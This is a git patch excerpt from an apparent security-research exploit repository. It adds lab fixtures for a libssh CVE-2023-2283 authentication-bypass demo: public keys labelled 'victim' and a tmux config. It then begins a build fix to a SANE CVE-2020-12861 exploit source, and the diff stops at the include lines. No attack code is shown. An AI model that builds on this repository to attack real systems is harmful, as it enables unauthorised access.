diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/authorized_keys b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/authorized_keys
new file mode 100644
index 0000000..1ecefa0
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/authorized_keys
@@ -0,0 +1 @@
+ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDG8eH3ZcBaTcwg/Gclb+ZYWZRQh9RvHQnQNY/lIa8mW victim@b1b586610139
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_ed25519.pub b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_ed25519.pub
new file mode 100644
index 0000000..1ecefa0
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_ed25519.pub
@@ -0,0 +1 @@
+ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDG8eH3ZcBaTcwg/Gclb+ZYWZRQh9RvHQnQNY/lIa8mW victim@b1b586610139
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_rsa.pub b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_rsa.pub
new file mode 100644
index 0000000..7efed1a
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_rsa.pub
@@ -0,0 +1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDVIGdVtCjMEzzbewMED01wAqaBcU6HytjUJoZt9Cm3lS0C691ZPayL14aj5uC9H73JDAabl58IEy6k++Wb5ryp74pozZ/H3swAuJlBidbeAUjtQbM5cxBT9hO7XE9YdHTXLzmVSF2NzyTt2HSZJPpYKsh0k7O56kfk/DfrIU7qGcIoDTNgK8zErXN2CjQ0dqm/sDZP1rxfHOfvLvTKx3WA30ko9c+zrIEJZ9pHV/OALOxPHf4WDewsMH3g1nG52hei2NG6r8nLP4BSEKcTbrebI6/RKOfXaFROMN01g9SY6Y0XmG0vAsyyRw0+oJMKAaoYgtokfBbJUJRtZ3uFavcA1DGRYn1Kswbwg+ZWMYoPRTTJ/Hzl8DqViWUOdsu9kHm24orPJZEajAo6kvjEjUQj2CKMbUVbxYB54S+taSXDhbeYWx1hACN/L8FufLdtW2veeuUOKJ0MtOMRCu5uCvLI7Y2wI6xxGa3jHOap81jyNa1vuMYfkk1z3jk5Ol5rlKE= victim@b1b586610139
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.tmux.conf b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.tmux.conf
new file mode 100644
index 0000000..f2da785
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.tmux.conf
@@ -0,0 +1,11 @@
+# Enable 256 colors
+set -g default-terminal "screen-256color"
+
+# Enable using the mouse to switch windows.
+set -g mouse on
+
+# Don't lose track of SSH_AGENT etc. from parent environment.
+set -g update-environment -r
+
+# history buffer size
+set-option -g history-limit 100000
From 9539ec35eac2e06b76438c163b783efbe896f66a Mon Sep 17 00:00:00 2001
From: Kevin Backhouse
Date: Thu, 6 Jul 2023 16:13:59 +0100
Subject: [PATCH 15/53] Fix build error
---
.../SANE/epsonds_CVE-2020-12861/sane_backends_exploit.cpp | 3 +++
1 file changed, 3 insertions(+)
diff --git a/SecurityExploits/SANE/epsonds_CVE-2020-12861/sane_backends_exploit.cpp b/SecurityExploits/SANE/epsonds_CVE-2020-12861/sane_backends_exploit.cpp
index 1a36262..e5fbbcb 100644
--- a/SecurityExploits/SANE/epsonds_CVE-2020-12861/sane_backends_exploit.cpp
+++ b/SecurityExploits/SANE/epsonds_CVE-2020-12861/sane_backends_exploit.cpp
@@ -3,6 +3,9 @@
#include
#include